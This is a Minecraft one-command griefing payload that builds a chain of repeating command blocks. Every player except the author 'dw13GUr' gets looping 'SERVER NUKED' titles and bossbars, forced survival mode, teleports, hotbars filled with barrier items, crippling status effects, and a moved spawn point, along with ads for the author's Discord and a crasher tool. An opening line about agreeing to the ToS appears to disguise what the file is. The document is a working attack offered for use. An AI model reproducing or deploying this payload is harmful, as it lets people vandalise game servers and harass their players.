Erase this if you agree with ToS, 
license and other stuff.
summon falling_block ~ ~1 ~ {
  BlockState: {Name: "redstone_block"},
  Time: 10,
  Passengers: [
    {
      id: "armor_stand",
      Health: 1,
      Passengers: [
        {
          id: "falling_block",
          BlockState: {Name: "activator_rail"},
          Time: 10,
          Passengers: [
            {id: "command_block_minecart", Command: "gamerule commandBlockOutput false"},
            {id: "command_block_minecart",Command: "setblock ~ ~ ~-1 repeating_command_block{Command:'title @a[name=!\"dw13GUr\"] title {\"text\":\"\", \"extra\":[{\"text\":\"SERVER NUKED BY DW13GUR.\", \"color\":\"dark_red\"}]}'}"},
            {
              id: "command_block_minecart",
              Command: "setblock ~ ~ ~-2 repeating_command_block{Command:'title @a[name=!\"dw13GUr\"] subtitle {\"text\":\"\", \"extra\":[{\"text\":\"dw13GUr on top\", \"color\":\"dark_red\"}]}'}"
            },
            {
              id: "command_block_minecart",
              Command: "setblock ~ ~ ~-3 repeating_command_block{Command:'tellraw @a[name=!\"dw13GUr\"] {\"text\":\"\", \"extra\":[{\"text\":\"DW13GUR HACKED YOUR SERVER! ONLY WAY OUT - CLOSE SERVER OR LEAVE! DISCORD - dw13gur. GET MC_GZU_CRASHERV4 ON GITHUB\", \"color\":\"dark_red\"}]}'}"
            },
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-4 repeating_command_block{Command:'gamemode survival @a[name=!\"dw13GUr\"]'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-5 repeating_command_block{Command:'playsound minecraft:entity.ender_dragon.death voice @a[name=!\"dw13GUr\"]'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-6 repeating_command_block{Command:'tp @a[name=!\"dw13GUr\"] ~ ~-2 ~'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-7 repeating_command_block{Command:'fill ~-3 ~-1 ~-3 ~3 ~-3 ~3 minecraft:bedrock replace'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-8 repeating_command_block{Command:'kill @e[type=minecraft:item]'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-9 repeating_command_block{Command:'playsound minecraft:item.totem.use voice @a[name=!\"dw13GUr\"]'}"},
            {id: "command_block_minecart",Command: "setblock ~ ~ ~-10 repeating_command_block{Command:'give @a[name=!\"dw13GUr\"] barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}} 2304'}"},
            {id: "command_block_minecart",Command: "setblock ~ ~ ~-39 repeating_command_block{Command:'title @a[name=!\"dw13GUr\"] actionbar {\"text\":\"\", \"extra\":[{\"text\":\"SERVER NUKED BY DW13GUR.\", \"color\":\"dark_red\", \"bold\":\"true\", \"underlined\":\"true\"}]}'}"},
            {id: "command_block_minecart",Command: "setblock ~ ~ ~-19 repeating_command_block{Command:'bossbar add test14886951 {\"text\":\"Your server has been nuked by dw13GUr. Discord: dw13gur\", \"color\":\"dark_red\", \"underlined\":\"true\", \"bold\":\"true\"}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-20 repeating_command_block{Command:'bossbar set minecraft:test14886951 players @a'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-21 repeating_command_block{Command:'bossbar set minecraft:test14886951 value 100'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-22 repeating_command_block{Command:'bossbar set minecraft:test14886951 color red'}"},

            {id: "command_block_minecart",Command: "setblock ~ ~ ~-23 repeating_command_block{Command:'bossbar add test148869511 {\"text\":\"Your server has been nuked by dw13GUr. Discord: dw13gur\", \"color\":\"dark_red\", \"underlined\":\"true\", \"bold\":\"true\"}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-24 repeating_command_block{Command:'bossbar set minecraft:test148869511 players @a'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-25 repeating_command_block{Command:'bossbar set minecraft:test148869511 value 100'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-26 repeating_command_block{Command:'bossbar set minecraft:test148869511 color red'}"},

            {id: "command_block_minecart",Command: "setblock ~ ~ ~-27 repeating_command_block{Command:'bossbar add test148869512 {\"text\":\"Your server has been nuked by dw13GUr. Discord: dw13gur\", \"color\":\"dark_red\", \"underlined\":\"true\", \"bold\":\"true\"}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-28 repeating_command_block{Command:'bossbar set minecraft:test148869512 players @a'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-29 repeating_command_block{Command:'bossbar set minecraft:test148869512 value 100'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-30 repeating_command_block{Command:'bossbar set minecraft:test148869512 color red'}"},

            {id: "command_block_minecart",Command: "setblock ~ ~ ~-31 repeating_command_block{Command:'bossbar add test148869513 {\"text\":\"Your server has been nuked by dw13GUr. Discord: dw13gur\", \"color\":\"dark_red\", \"underlined\":\"true\", \"bold\":\"true\"}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-32 repeating_command_block{Command:'bossbar set minecraft:test148869513 players @a'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-33 repeating_command_block{Command:'bossbar set minecraft:test148869513 value 100'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-34 repeating_command_block{Command:'bossbar set minecraft:test148869513 color red'}"},

            {id: "command_block_minecart", Command: "setblock ~ ~ ~-35 repeating_command_block{Command:'kill @e[type=minecraft:item]'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-36 repeating_command_block{Command:'gamerule mobGriefing false'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-18 repeating_command_block{Command:'fill ~ ~1 ~18 ~ ~1 ~-83 minecraft:redstone_block'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-38 repeating_command_block{Command:'title @a[name=!\"dw13GUr\"] title {\"text\":\"\", \"extra\":[{\"text\":\"SERVER NUKED BY DW13GUR.\", \"color\":\"dark_red\",\"underlined\":\"true\",\"bold\":\"true\"}]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~1 ~-18 redstone_block"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-39 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.0 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-40 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.1 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-41 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.2 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-42 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.3 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-43 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.4 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-44 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.5 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-45 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.6 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-46 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.7 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-47 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] hotbar.8 barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-48 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] armor.head carved_pumpkin{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-49 repeating_command_block{Command:'replaceitem entity @a[name=!\"dw13GUr\"] weapon.offhand barrier{display:{Name:\"{\\\"text\\\":\\\"SERVER WAS HACKED BY DW13GUR. DISCORD - dw13GUr\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",Lore:[\"{\\\"text\\\":\\\"THE SERVER WAS HACKED BY DW13GUR, AKA XYE4NEK. DISCORD - dw13GUr.\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\",\"{\\\"text\\\":\\\"LEAVE THE GAME AS FAST AS YOU CAN\\\",\\\"color\\\":\\\"dark_red\\\",\\\"underlined\\\":true,\\\"bold\\\":true}\"]}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-50 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] health_boost 999999 255'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-51 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] wither 999999 1'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-52 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] absorption 999999 255'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-53 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] instant_health 1 10'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-54 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] hunger 999999 255'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-55 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] nausea 999999 255'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-56 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] weakness 999999 255'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-57 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] mining_fatigue 999999 255'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-58 repeating_command_block{Command:'effect give @a[name=!\"dw13GUr\"] glowing 999999 1'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-59 repeating_command_block{Command:'effect give @a[name=\"dw13GUr\"] night_vision 999999 1'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-60 repeating_command_block{Command:'scoreboard objectives add test14886951 dummy {\"text\":\"🔥 SERVER NUKED BY DW13GUR. DISCORD - dw13GUr. 🔥\",\"color\":\"dark_red\",\"bold\":\"true\",\"underlined\":\"true\"}'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-61 repeating_command_block{Command:'setblock ~ ~ ~-41 repeating_command_block{Command:'scoreboard objectives setdisplay sidebar test14886951'}"},

            {id: "command_block_minecart", Command: "setblock ~ ~ ~-62 repeating_command_block{Command:'scoreboard players set SERVER_NUKED_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-63 repeating_command_block{Command:'scoreboard players set S3RVER_NUKED_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-64 repeating_command_block{Command:'scoreboard players set SERV3R_NUKED_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-65 repeating_command_block{Command:'scoreboard players set SERVER_NUK3D_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-66 repeating_command_block{Command:'scoreboard players set SERV3R_NUK3D_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-67 repeating_command_block{Command:'scoreboard players set S3RVER_NUK3D_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-68 repeating_command_block{Command:'scoreboard players set S3RV3R_NUKED_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-69 repeating_command_block{Command:'scoreboard players set S3RV3R_NUK3D_BY_DW13GUR_DISCORD_dw13gur test14886951 0'}"},

            {id: "command_block_minecart", Command: "setblock ~ ~ ~-70 repeating_command_block{Command:'scoreboard players set SERVER_NUKED_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-71 repeating_command_block{Command:'scoreboard players set S3RVER_NUKED_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-72 repeating_command_block{Command:'scoreboard players set SERVER_NUK3D_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-73 repeating_command_block{Command:'scoreboard players set S3RVER_NUK3D_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-74 repeating_command_block{Command:'scoreboard players set S3RV3R_NUKED_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-75 repeating_command_block{Command:'scoreboard players set SERV3R_NUK3D_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-76 repeating_command_block{Command:'scoreboard players set S3RV3R_NUK3D_8Y_DW13GUR_DISCORD_dw13gur test14886951 0'}"},

            {id: "command_block_minecart", Command: "setblock ~ ~ ~-77 repeating_command_block{Command:'scoreboard players set S3RVER_NUKED_BY_DW13GUR_D1SCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-78 repeating_command_block{Command:'scoreboard players set SERV3R_NUKED_BY_DW13GUR_D1SCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-79 repeating_command_block{Command:'scoreboard players set S3RV3R_NUKED_BY_DW13GUR_D1SCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-80 repeating_command_block{Command:'scoreboard players set SERV3R_NUK3D_BY_DW13GUR_D1SCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-81 repeating_command_block{Command:'scoreboard players set S3RVER_NUK3D_BY_DW13GUR_D1SCORD_dw13gur test14886951 0'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-82 repeating_command_block{Command:'setworldspawn ~ ~ ~82'}"},
            {id: "command_block_minecart", Command: "setblock ~ ~ ~-83 repeating_command_block{Command:'gamerule spawnRadius 0'}"},
          ]
        }
      ]
    }
  ]
}
